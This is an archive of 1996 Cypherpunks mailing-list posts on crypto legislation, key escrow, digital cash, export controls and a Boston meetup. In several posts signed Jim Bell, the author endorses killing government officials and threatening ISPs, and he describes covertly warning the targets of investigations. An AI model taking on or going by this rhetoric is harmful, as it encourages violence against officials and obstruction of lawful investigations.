Congresswoman Anna Eshoo
http://www-eshoo.house.gov/

Congressman Bob Goodlatte
mailto:talk2bob@hr.house.gov

Congressman Tom Campbell
mailto:campbell@hr.house.gov

Congressman Robert Walker
http://www.house.gov/walker/welcome.html

Congresswoman Jennifer Dunn
mailto:dunnwa08@hr.house.gov

Congressman Vern Ehlers
http://www.house.gov/ehlers/welcome.html

Senator Slade Gorton
http://www.senate.gov/senator/gorton.html

Senator Conrad Burns
http://www.senate.gov/~burns

Senator Ron Wyden
http://www.senate.gov/senator/wyden.html

Congressman Sam Farr
http://www.house.gov/farr/welcome.html

Congressman Bill Luther
http://www.house.gov/luther/welcome.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Mar 1996 12:51:38 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u2ism-0008yfC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:49 AM 3/29/96 -0500, Black Unicorn wrote:
>On Thu, 28 Mar 1996, jim bell wrote:
>
>> Escrowing encrypted keys makes them useless to subpoena, and in 
>> fact it helps the key owner because the escrow agent can (and, in fact, 
>> must!) be obligated to inform the key owner if his key is requested.
>
>I thought I would take the time to let everyone know that this is 
>baseless as well.  Most jurisdictions forbid third parties to reveal 
>prosecution inquries to the principal for which they are holding 
>documents or other information.  A VERY few have laws on the books that 
>require this disclosure.  Switzerland is no longer one of them.

As usual, Unicorn is FOS.  Not entirely in his facts, but in his 
conclusions.  To "forbit third parties to reveal prosecution inquiries" is 
an obvious violation of freedom of speech, and in fact is PRIOR RESTRAINT.  
Maybe Unicorn can't see what's wrong with that, but I can.  It is unclear 
whether this has ever been tested in court, or whether that test occurred 
recently.

Now, in practice I recognize that in the past large organizations which are 
subpoenaed usually comply with requests to keep an inquiry secret, but one 
of the effects of the "crypto revolution" and the "net revolution" is 
clearly to decentralize information power from the places it used to be 
carefully kept (IBM, ATT, etc) and is now distributing it among many more, 
far smaller organizations which are much closer to the people the 
prosecutors might be inclined to target.  (for example, your friendly 
neighborhood ISP).  

Furthermore, the development of good encryption will allow a willing ISP 
(for example) to send an encrypted (and possibly semi-anonymous) message to 
the target of the investigation  (or possibly a public USENET area, 
unaddressed), containing a pre-arranged alarm code to be sent to the target 
of the investigation, in such a way that any other people (for example, the 
brainless cops) won't know.  The target will be assured (though encryption 
and signing, or prior arrangement) that the message could only have 
originated from the contractor (ISP) but the target (and nobody else, as 
well) will not be able to prove this knowledge to a third party.

For example, if I ask my ISP to send me an anonymous, encrypted message with 
the word, "Rosebud" in it to me if he receives any requests to tap my 
connection, he can do so with no fear of being discovered, because no third 
party can decrypt the message, know who is is from, or know the real meaning 
of the word, "Rosebud" in the context of an encrypted, anonymized message.  
Further, since the whole thing is by pre-arrangement, even I cannot prove 
(to the satisfaction of a third party) that the message really meant what I 
would interpret it to mean.  The message is useful to me, as a warning, but 
it could never turn around and "bite" the ISP.


The end result is that your foolish opinion of what the law allows will 
simply become irrelevant: The government cannot mandate what it cannot 
enforce, and it cannot enforce what it cannot detect.

You may ask, "Why would the operator of a small ISP want to take even a 
minor risk informing the target of the investigation?"  There are a number 
of obvious answers:

1.  He's promised his customer to do so.

2.  It's in the contract.

3.  And the ever-popular, "He's afraid of getting killed, or his ISP 
business torched, if word later leaks out that he failed to inform his 
customer of an investigation."  Don't underestimate the significance of such 
a risk to those people.  Destruction of even a full phone switch would not 
have fazed ATT in the 1960's, but a small ISP depends on valuable equipment 
at (presumably) a single location.  Getting a person mad at them for failing 
to anonymously inform them of an inquiry would NOT be the best tactic for 
these small-time operators.


>Even if a judge was convinced by the defense not to levy heavy fines 
>against a third party who pleaded that he or she was simply unable to 
>comply, informing the principal would literally assure such fines would 
>be imposed regardless. 

Again, you assume that informing "the principal" would be detectable.  Your 
wishful thinking is palpable.  I really wish you'd be able to distinguish 
what "the law" could do, given limitless knowledge of the actions of the 
population, and the REAL WORLD, in which those judges and prosecutors and 
cops are limited in what they can do by what they can know.  This is 
critical, because we are rapidly approaching a time in which what these 
people know will be dramatically limited by many of the technologies 
regularly discussed on Cypherpunks.

>Criminal charges of obstruction could easily attach.

Bullets could easily fly.


You repeatedly state what might, hypothetically, happen, but you don't back 
it up with a realistic assessment of what actually would _likely_ happen.

> Obstruction in connection with narcotics cases or other major 
>felonies are generally extraditable offenses as well.

Someday, obstruction of the Constitution by government agents will be a 
death-penalty crime.

>Once again Mr. Bell pulls legal analysis out of his rectum rather than 
>basing it in fact or research.
>
>With Mr. Bell as a defense attorney, who needs prosecutors?

If I intended to limit myself to the tools of the court room (that's the 
enemy's playpen, BTW) I would probably be just as ineffective as the next 
defense attorney.

I've frequently found that the question of who wins in any confrontation is 
strongly affected by whether I allow myself to be lured into the home 
territory of the other.  This is actually more a psychological battle than a 
physical one.    You obviously believe that the cops and judges can 
frequently win, if they are able to control the location of the battle; this 
is true, but it ignores the fact that "the legal system" is generally an 
8-hour-per-day, 40-hour-per week system.  Going outside the system and 
attacking directly bypasses all the rules and restrictions which are set up 
to allow THEM to win.

This may sound unfair to people brainwashed to believe that the court system 
is and should be the final arbiter, but I suggest that long ago they lost 
whatever moral authority they once might have had. Every time you talk about 
them fining or prosecuting some third party for not cooperating, you 
demolish your own claims.

Jim Bell
jimbell@pacifier.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 30 Mar 1996 19:15:18 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Party! (Boston)
Message-ID: <199603291529.KAA03136@homeport.org>
MIME-Version: 1.0
Content-Type: text



	Adam Shostack & Eric Hughes
     invite you to the third occaisonal

Cypherpunks, Cypher-Anarchists, info-terrorists, smart-drug dealers,
photoshop pornographers, e-money launderers, provocateurs, undercover
agents and fellow travellers

	Post Computers, Freedom, and Privacy party

	Saturday, 8:00 PM

	14 Central Terrace
	Newton MA 244 5243



Directions:


BY CAR, FROM THE NORTH, SOUTH, or WEST:

  (West: Take Mass Pike/Rt 90 to exit 14, 128/95.  Get off onto 
   Rt 30 just before you would otherwise get on 128/95)

  Take Rt 128/95 to Exit 14, Rt 30 East, aka Commonwealth Avenue
  Take a right onto Lexington Street at the fourth light
    There will be a Mobil station on your left.
    There's a green sign pointing left labelled "Waltham 2".
    There's a green sign pointing right labelled "Auburndale Center".
    (If you pass a Star Market, you've passed it.)
  Go over the bridge
  At the end of the bridge, take a right onto Central Street.
  Take an immediate left onto Central Terrace

BY CAR, FROM THE EAST:

  Take Commonwealth Avenue / Rt 30 West
  Left onto Lexington Street at Auburndale, just after the Gulf station.
    (If you see the Mariott Hotel, you've gone too far.)
  Go over the bridge
  At the end of the bridge, take a right onto Central Street.
  Take an immediate left onto Central Terrace

PUBLIC TRANSPORTATION

MBTA or Bus to Riverside Station (End of the D Line)
  Call us to be picked up, or...
  Exit the station onto Grove Street and take a left
  Staying on Grove Street, walk for about three quarters of a mile
  Central Terrace will be on your left
  If you get to the bridge, go left onto Central Street before the
  bridge and your next left will be the other side of Central Terrace

Commuter Rail to Auburndale Station
(Worcester Line)
  Cross one of the the bridges over the Pike.
  If you are at a traffic light, go right and then left onto 
  Central Terrace.
  If you are not at a light and could go straight onto Woodland 
  Road, take a left and Central Terrace will be your third right.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 30 Mar 1996 20:51:12 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199603291832.KAA06165@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: jeff@BlackMagic.Com (Jeff)
> 
>   Regarding "What backs up digital currency/cash", a hypothetical situation
>   just to see what you guys think.  Can this happen ?  I honestly have my
>   doubts, mostly I see logistical problems (finding a mechanism, etc, if
>   you recall my mini-rant just a few days ago).  Anyway, these are some of
>   the things I honestly feel would have to happen for a true Internetwork
>   currency to take off, if that's even possible.
> [Lots of examples of tokens issued by various businesses and other groups]

I think this is an interesting idea, and no doubt will happen in some
form.  Coupons and other special tokens could be issued electronically.
But there are limits to how far it is likely to go, since these tokens
are competing with ordinary cash-backed tokens (digital cash).  It's like
today, maybe you could buy something at the swap meet using a handful of
50-cents-off toilet paper coupons, if the seller was agreeable.  But this
becomes in essence a barter trade.  Why do this, if the cash alternative
is much more widely accepted?

Another factor that arises is that if some token does catch on and
circulate widely, it could be subject to regulation.  I understand that
in Las Vegas, some people started using casino chips as money.  You
could buy things with them, and they were accepted since people knew
they could be turned in for cash at the casino.  But the Feds cracked
down and brought the practice to a halt.  (I will ignore for now the
question of whether such a crackdown could work on the net, but it would
at least be a barrier to the acceptance of such tokens.)

The idea of your "market square" token, which represents a basket of
other tokens, is interesting, but it seems like you're basically
re-inventing money.  I don't quite understand the specifics of your
proposal, where the market square token is based on the "market value" of
the other tokens.  In what units is this market value expressed?  It
seemed like what you had instead was a set of relative prices, where each
token was worth a certain number of each other kind.  I don't see how you
can get a unique market value for each token out of that system.  It
doesn't seem like the relative value idea really works, anyway, as it
suffers from the barter problem that there will be too few people who
want to trade their shoe tokens for fruit tokens.  That was what
motivated the transition from barter to money in the first place, or so
the story goes.

If your overall point is that even without digital cash, we would end
up with some form of electronic money eventually anyway, I think it is
true.  Entrepreneuers abhor a vacuum, and if the need is there it will
be met.  But the fact is that we are likely to have digital cash before
all these other things, so I don't really see the whole scenario coming
to pass.  I do think a lot of your specific applications are
interesting, though, and hopefully there will be many more creative
uses of this technology.  I know Eric Hughes a while back was talking
about a way for players to transfer wealth between MUD games using a
token based system.  There are a lot of game possibilites.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Sat, 30 Mar 1996 08:58:32 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <9603291828.AA1144@smtp1.chipcom.com>
MIME-Version: 1.0
Content-Type: text/plain


unicorn @ schloss.li (Black Unicorn) wrote:
>On Tue, 26 Mar 1996, Duncan Frissell wrote:
>>...
>> In fact, I suppose that government operation of the identification system
>> (drivers' licenses, passports, etc.) in general is also horribly inefficient
>> and should be attacked on efficiency grounds.
>
>You might not like what you get in response.  Streamlined and uniform 
>identity documents generated at birth and renewed with tax filings would 
>be the likeliest efficiency improvement.  An inefficient government 
>identification system is to the advantage of the privacy seeker.

Indeed.  A wise man once said "Thank goodness we don't get
all the government we pay for".  Government inefficiency is our
friend (except at tax time) -- don't wish for it to get more efficient unless
it gets a lot smaller FIRST.

 paul
!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "The only purpose for which power can be rightfully exercised over 
!  any member of a civilized community, against his will, is to prevent
!  harm to others.  His own good, either physical or moral, is not
!  a sufficient warrant."    -- John Stuart Mill, "On Liberty" 1859




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Sat, 30 Mar 1996 14:57:22 +0800
To: cypherpunks@toad.com
Subject: Re: PPV Descrambler
In-Reply-To: <315AE567.7405@mail.interconnect.net>
Message-ID: <Pine.SCO.3.91.960329105638.21464B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, Dan Nikolai wrote:

<snip>

> > This is cypherpunks. Not Cable-TV-Piracy-Punks.
> > 
> > Dave Merriman

<snip>

> "This is cypherpunks. Not Cable-TV-Piracy-Punks."
> 
> Cable-TV-Piracy-Punks?  Who's this guy?  I asked for a text file (for 
> informational purposes of course).  Oh and David K. Merriman, PPV is 
> not on cable.

PPV sure is on cable.  We get five or six channels of the crap pumped in 
over the cable in my neck of the woods.  You call a six digit telephone 
number, it ANI's you to your account records, and then tweaks the 'key' 
into your box for the duration of the show.  End of the month, you get 
a bill for the program.  That's what us country folks call "pay per view."

Maybe you're looking for Satellite-Dish-TV-Piracy-Punks or 
Small-Dish-Digital-TV-Piracy-Punks?  They're up the corner, around on the 
left -  can't miss 'em.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Mar 1996 17:19:28 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: New crypto bill to be introduced
Message-ID: <m0u2lOI-0008xVC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:35 AM 3/29/96 -0500, Declan B. McCullagh wrote:
>Two observations:
>
>* Jim Bell would be unduly suspicious if _anyone_ introduced a crypto
>bill in Congress. I'm not surprised that here on conspiracypunks someone
>would be raising alarums without knowing what they're talking about.

It's not that I'm suspicious of the wording of this new bill; I haven't even 
seen it yet.  What is a bit suspicious is its timing.  Let's see, where do I 
begin?   When the Leahy bill was first discussed around here, there were 
claims (which, arguably, might be true) that this bill "couldn't be passed" 
without the negative portions of the bill (key escrow commentary; 
criminalization of encryption use, etc.)   More recently, it was claimed 
that the Leahy bill was dead, and couldn't be revived by the end of the 
session due to lack of time.  I don't necessarily challenge these claim; but 
I note them and I also note that this new bill is going to run into the same 
kind of time restraints as the Leahy bill would have, even more so.  Even 
worse, this new bill will split off support from Leahy, meaning that 
(everything else being equal) it is hard to imagine how this new bill (even 
if it is everything we want, and nothing we don't want) will get passed.  

Maybe that's the idea:  As Tim May pointed out, at this time maybe no bill 
is better than any bill.  And maybe what is needed is a bill to siphon 
support away from Leahy, to ensure it's dead, which I presume this new bill 
will do quite well even if it's never voted on.  If that's the case,  this 
new bill may be a "conspiracy," but it might be a conspiracy that I can 
actually sympathize with and support, even like.

Nevertheless so, I would at least like to look that gift horse in the mouth, and 
understand the motivations of the people proposing this new bill.  


>* Jim Bell says we're "overdoing it on this 'List of Shame' thing." Not
>at all -- we're proud to be on it! And you, Jim Bell, are one of my
>primary suspects for authorship.

That is a silly conclusion.  The primary reason for anonymity with such 
postings is to avoid controversy being associated with one's name.  I, as 
anyone who's read my writing can attest, not only do not try to avoid 
controversy, but in fact appear to seek it out, perhaps even to revel in it. 
 Having taking a strongly anti-Leahy position before this anonymous poster 
first appeared, it would be pointless for me to add my commentary in 
anonymous form to that which I've already posted under my own name.

Furthermore, I've pointed out that there is no reason to exclude the 
possibility that this anonymous poster isn't deliberately going too far, 
mixing "deserving" names in with undeserving ones, in order to discredit 
those people who are criticizing the supporters of the Leahy bill.  I can't 
say this for certain, because there were a number of names on this "list of 
shame" whose positions on Leahy I haven't even seen.  Nevertheless, 
propaganda techniques are sophisticated, and I do notice a suspicious number 
of people who appeared to want to "stand up for those people" rather than 
standing up for the positions they took.  (Whatever they were.)

The implication is that the people who oppose this "list of shame" are doing 
so primarily for PERSONALITY reasons, rather than on the issues.  I would 
feel better about the whole thing if the people who volunteered for the list 
had engaged in some sort of serious effort to show that the placement of the 
other people on that list was unjustified.  Lacking even the most 
rudimentary effort along these lines, I really wonder who (and what) these 
people think they're supporting.


Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Mar 1996 14:20:33 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u2lXz-0008yYC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 AM 3/29/96 -0500, Black Unicorn wrote:
>On Thu, 28 Mar 1996, jim bell wrote:
>
>> At 03:46 PM 3/28/96 -0500, Black Unicorn wrote:

>> >Given the significant contempt charges that can follow a refusal to 
>> >produce items (anonymous or not) this still depends on the absence of 
>> >initial detection.
>> 
>> You clearly don't understand.  You're making the ASSumption that the 
>> organization keeping the keys can produce them in a form that is "useful" to 
>> the cops.  Escrowing encrypted keys makes them useless to subpoena, and in 
>> fact it helps the key owner because the escrow agent can (and, in fact, 
>> must!) be obligated to inform the key owner if his key is requested.
>
>You clearly don't understand.  You are an ass making an assumption that a 
>court cares or believes that the witness can actually produce the 
>requested information or not.  Fines tend to be imposed regardless.

Bullets don't care that a judge was justified in his decisions, either.  

Ultimately, your repeated argument is simply, "The legal system can be 
abused by those who work in it."  I don't challenge this claim, in fact my 
position depends on its truth; my assertion  is that the current legal situation is 
out of the control of people faithful to the meaning of the Constitution, 
and has been so for a long time.  One of the main reasons I promote a 
de-facto (and unofficial) death penalty for recalcitrant politicians and 
other government employees is because the traditional "checks and balances" 
system seems to no longer be working for the interests of the average citizen.


>> And in any case, I consider it highly doubtful that anybody would contract 
>> with an escrow agent and identify himself by name
>
>The same way no one creates Panamanian companies with their own name.  So 
>what?  Third parties are still fined heavily.

Any specific examples?  No?  I thought so!  In any case, if "third parties" 
are "fined heavily," that is even more justification for setting up a method 
to deter out-of-control courts.  Remember, freedom is always strongly 
disliked by authoritarian and totalitarian governments; you need to explain 
why the hypotheticals you're describing don't indicate that some emergency 
effort is needed.


>>It would be a simple 
>> matter to operate "escrow agents," just glorified data-holders, who would 
>> receive data anonymously and send it out just as anonymously, to the person 
>> who can identify themselves via some sort of encrypted ID system.
>
>And simpler for courts to fine them out of existance (which happened to 
>several banks, trust companies and agents in Cayman and Panama.

I guess you really don't realize that every claim you make demolishes the 
justification for your obvious hostility to a system which prevents exactly 
the kind of abuses you list.  (Although it really isn't clear whether you 
would classify them as "abuses.")

>   Even 
>> "detecting" such a transfer is useless because the cops won't be able to 
>> figure out what the data is, since it's encrypted in both directions while 
>> being transferred, in addition to being encrypted while being held, with a 
>> code the escrow agent doesn't know.
>
>They need only suspect or have reason to suspect it might be exculpatory.
_                                                             ^^^^^^^^^^^
Sloppy word usage.  I think you meant, "incriminating."  Typical for you.

>Practically speaking this means convincing a judge.  Not hard when the 
>words "offshore holding company" are mentioned in a brief or hearing.
>
>> In short, you need to comprehend what you're responding to before you 
>> express your opinions.  You're living down to my expectations.
>
>In short, go to law school, then try to talk about legal issues.

In this day and in this country, "going to law school" is basically 
synonymous with "learn to get along with the current legal system."  It 
should have been obvious long ago that I don't consider the current legal 
system to be worth living with.


>> >> In fact, I suppose that government operation of the identification system
>> >> (drivers' licenses, passports, etc.) in general is also horribly inefficient
>> >> and should be attacked on efficiency grounds.
>> >
>> >You might not like what you get in response.  Streamlined and uniform 
>> >identity documents generated at birth and renewed with tax filings would 
>> >be the likeliest efficiency improvement.  An inefficient government 
>> >identification system is to the advantage of the privacy seeker.
>> 
>> You seem to be ASSuming that an "efficient identification system" is one 
>> that will ALSO operate to the benefit of the government, as opposed to the 
>> individual who wants to be identified for only limited purposes.
>
>Without getting into semantics, and "efficient identification system" 
>implies one that identifies people efficently.  Blocking government use, 
>or limiting it to certain circumstances is not efficiency.

Only if viewed from the statist perspective, which I suppose is easy for 
you.  An "efficient identification system" identifies me, efficiently, to 
anybody I _choose_ to be identified to, to whatever level of identification 
I choose to allow.  Nothing more.   Read Chaum's Sci Am article, carefully.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Sat, 30 Mar 1996 15:08:42 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Random Number Testing
Message-ID: <v02140b0aad81dff145f3@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 01:34 3/29/96, Deranged Mutant wrote:

>> -     Is this apparent entropy really *unpredictable* (the most useful
>>       definition of "random" for cryptographic purposes)?
>
>Good question. You'd need to look for patterns.  Barring none, you'd
>have to guess the factors that lead to the entropy, and then see if
>there's a way to reverse-engineer it. (Perhaps use a stripped down
>system and build it up, or disable some of the hardware and OS
>features etc.)

There's more to unpredictability than patterns or their absense.  In
addition, you have to look at the ability of anyone else on the same
machine to learn things about the data you're gathering and subtract the
entropy of that commonly available data.

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 13:46:01 +0800
Subject: No Subject
Message-ID: <199603290546.NAA11595@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


The syslog problem is fixed in baseline SunOS 5.5.

Sun and HP are apparently doing what the stupid law mandates - and they
should do so, whether someone at NSA (or whatever) is on their case or
not.  :)  They should also have someone in their respective legal
departments bucking ITAR very hard.

"tres-dangerous" must have been typed with a snear, no?

ECafe Anonymous Remailer wrote:
> 
> I noticed that Sun's latest libc patch (101759-04) is empty.  Previous
> versions contained the complete U.S. version of libc, including the
> tres-dangerous DES and crypt functions.  In the current rev only the
> README remains, presumably because:
>         EXPORT INFORMATION: This patch includes code which performs
>         cryptographic functions, which are subject to U.S. export
>         control, and must not be exported outside the U.S. without
>         prior approval of the U.S. government.  Prior export approval
>         must be obtained by the user of this patch.
> 
> So, you might ask, what fixes is Sun not distributing???
>     (Rev 04)
>         1190985 gethostbyname() can trash an existing open file descriptor.
>         1182835 portmapper silently fails with version mismatch by PC-NFS
>                 client
>         1219835 Syslog(3) can be abused to gain root access on 4.X systems.
> 
> Yup, that's right.  The syslog hole that was so well publicized by
> CERT will remain open indefinitely because the ITAR makes it illegal
> for Sun to distribute the fix!
> 
> So did HP and Sun spontaneously, simultaneously develop crypto awareness,
> or is some gummint dweeb whispering threats in their ear?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Roissetter <J.Roissetter@plymouth.ac.uk>
Date: Sat, 30 Mar 1996 07:01:57 +0800
To: cypherpunks@toad.com
Subject: Controversys in security
Message-ID: <150848663C2@cs_fs15.csd.plym.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I am currently writting a report into the controverys invovled with data 
encyption and have desided to target the current DES system, I have 
found pages on the internet explaining the new triple DES system 
thought i need more information on the current controversys involved 
with the current DES system i'm aware that the key is no longer long 
enough for data to be protected for any amount of time, thought i 
really need more information to draw conclutions, if there is anyone 
with information could they please forward it to me.
                                                                       jason roissetter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 29 Mar 1996 14:29:55 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <199603281947.LAA14441@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:22 AM 3/28/96 -0800, Timothy C. May wrote:
>... In any case, the issue is not the
>classes taken by _some_ (the few percent who study Russian, Japanese,
>Mandarin, etc.), but the topic of this thread: "Why Americans feel no
>compulsion to learn foreign languages."

I, at least, want to know something of the language of the countries I
travel in.  Being able to get a meal or a room for the night is useful.  As
a rock bottom minimum, I want to know the phrases: Hello, Good by, Please,
Thank You, More beer please, and Where's the bathroom.

The look of pleased surprise on the face of the Budapest resident when I
said "Thank you" to in Hungarian as he gave up his seat to me because I was
loaded down with caving equipment is something I still treasure.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 15:00:22 +0800
Subject: No Subject
Message-ID: <199603290700.PAA11741@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain



Blanc Weber writes:
> Perry, here's a question for you, and I am seriously interested in your
> answer:
[...]
> what, then, would you yourself consider proper for discussion here?
> [in the context of digital cash discussion]

I'd say that anything directly dealing with digital cash, its
implications, deployment, and technical issues associated with
it. General discussions of whether the Federal Reserve is a bunch of
evil old men and the like are what are out of bounds.

This means:

"How does blinding work"

and 

"Do you think that digital cash systems will hurt bank regulatory
supervision"

are fine things to talk about but

"Do you think the Federal Reserve issues counterfeit money"

are not.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 30 Mar 1996 17:16:10 +0800
To: cypherpunks@toad.com
Subject: Account ID Controls
Message-ID: <2.2.32.19960329200538.00759bf0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

We are informed that the primary method of social control in the future will
be account access control.  Bank account, credit account, phone account,
internet account, all of these accounts are supposed (or proposed) to be
restricted to True Persons (or other entities reliably linked to True
Persons).   The Powers That Be will then be able to track Bad Guys via their
account activity and use denial of service as a punishment.  Of course,
these controls will only work if the accounts are not anonymous.

Which leads us to the ads recently appearing in the New York Daily News.
Electronics Communications Corp (800) NYNEX 31 offers a no credit check
cellular phone.  You call them up, supply name, address and phone number and
they overnight you a phone C.O.D. for $243.56.  This includes one hour of
talk time.  The ongoing cost is $24.99/month and $36.00/hour (60 cents a
minute) for airtime (payable in advance).  You own the phone and your
service contract is renewed on a month-to-month basis as you pay the bill.

I wonder if they will ship to accomodation addesses?

If the authorities can't keep cellphone service out of the hands of the
unidentified anonymous hordes, it's hard to believe that they will be able
to keep any other kind account out of those hands.

DCF

"When phones are outlawed, only the outlaws will have phones."


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVxA4oVO4r4sgSPhAQEo2gQAo/1Is0hIMeQtRLii3rzl+s5+ZDPRbhSa
m1Zjk/kuaNdhzLej0r671AsWov131KMCcRvEM9QlxuLJnYWDiwXpEnaY3/terI+B
4H+s7T5uxzjnKyGVthOqW+bDSt2yur61j9BJULUiQJKNO/PiSHAXaqqkA5HxgFpq
875rXZMEEbk=
=/DJs
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Srour <bsrour@netnet.net>
Date: Fri, 29 Mar 1996 15:21:33 +0800
To: cypherpunks@toad.com
Subject: Returned mail: User unknown
Message-ID: <199603282136.PAA26198@netnet1.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain



Spelling is the KEY to life.

>>X-Sender: issup5@mail
>>Date: Mon, 26 Feb 1996 11:32:17 +0200
>>To: "cypherpunks@toad.com" <cypherpunks@toad.com>
>>From: Nibiru <nibiru@columbus.co.za>
>>Subject: unsubscrive
>>Sender: owner-cypherpunks@toad.com
>>
>>unsubscrive cypherpunks
>>
>>
>>-------------------------------------------------------------------
>>NIBIRU                                  
>>E-Mail : nibiru@columbus.co.za
>>South-Africa                                                          
>>--------------------------------------------------------------------
>>
>>
>>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeff@BlackMagic.Com (Jeff)
Date: Sat, 30 Mar 1996 19:24:48 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: What backs up digital money?
In-Reply-To: <hfinney@shell.portal.com>
Message-ID: <199603292029.PAA14637@Molasar.blackmagic.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 29, 10:32am, Hal wrote:
> Subject: Re: What backs up digital money?
> From: jeff@BlackMagic.Com (Jeff)
[snip]
> Another factor that arises is that if some token does catch on and
> circulate widely, it could be subject to regulation.  I understand that
> in Las Vegas, some people started using casino chips as money.  You
> could buy things with them, and they were accepted since people knew
> they could be turned in for cash at the casino.  But the Feds cracked
> down and brought the practice to a halt.  (I will ignore for now the
> question of whether such a crackdown could work on the net, but it would
> at least be a barrier to the acceptance of such tokens.)

  Absolutely- that's certainly the case with anything that "catches on",
  not just ways of transfering value.  If you get big and popular, there
  will be regulation, thus if life.  see: the Internet itself.

> The idea of your "market square" token, which represents a basket of
> other tokens, is interesting, but it seems like you're basically
> re-inventing money.  I don't quite understand the specifics of your
> proposal, where the market square token is based on the "market value" of
> the other tokens.  In what units is this market value expressed?  It
> seemed like what you had instead was a set of relative prices, where each
> token was worth a certain number of each other kind.  I don't see how you
> can get a unique market value for each token out of that system.  It
> doesn't seem like the relative value idea really works, anyway, as it
> suffers from the barter problem that there will be too few people who
> want to trade their shoe tokens for fruit tokens.  That was what
> motivated the transition from barter to money in the first place, or so
> the story goes.

  In that particular dream-land I was saying that the "market value" of the
  token follows the trade value of tokens on the exchange- that is to say,
  if X tokens are being traded for .5 Y tokens and 2 Z tokens, then X, Y,
  and Z can all be expressed in terms of a common 'A' value.  That A is the
  basis of the market value I was talking about.  What is a "dollar" if not
  expressed in terms of it's purchasing power.  The only thing that makes
  the dollar, or yen, etc, special is it's universal acceptance in whatever
  marketplace you happen to be trading.  I don't think there is any real
  problem with the idea itself, the implementation in my opinion would be
  darn near impossible though and would be dependent on the "lack of 
  something better", which a pupular digital cash scheme has already
  eliminated.  But now I'm just repeating your point ...

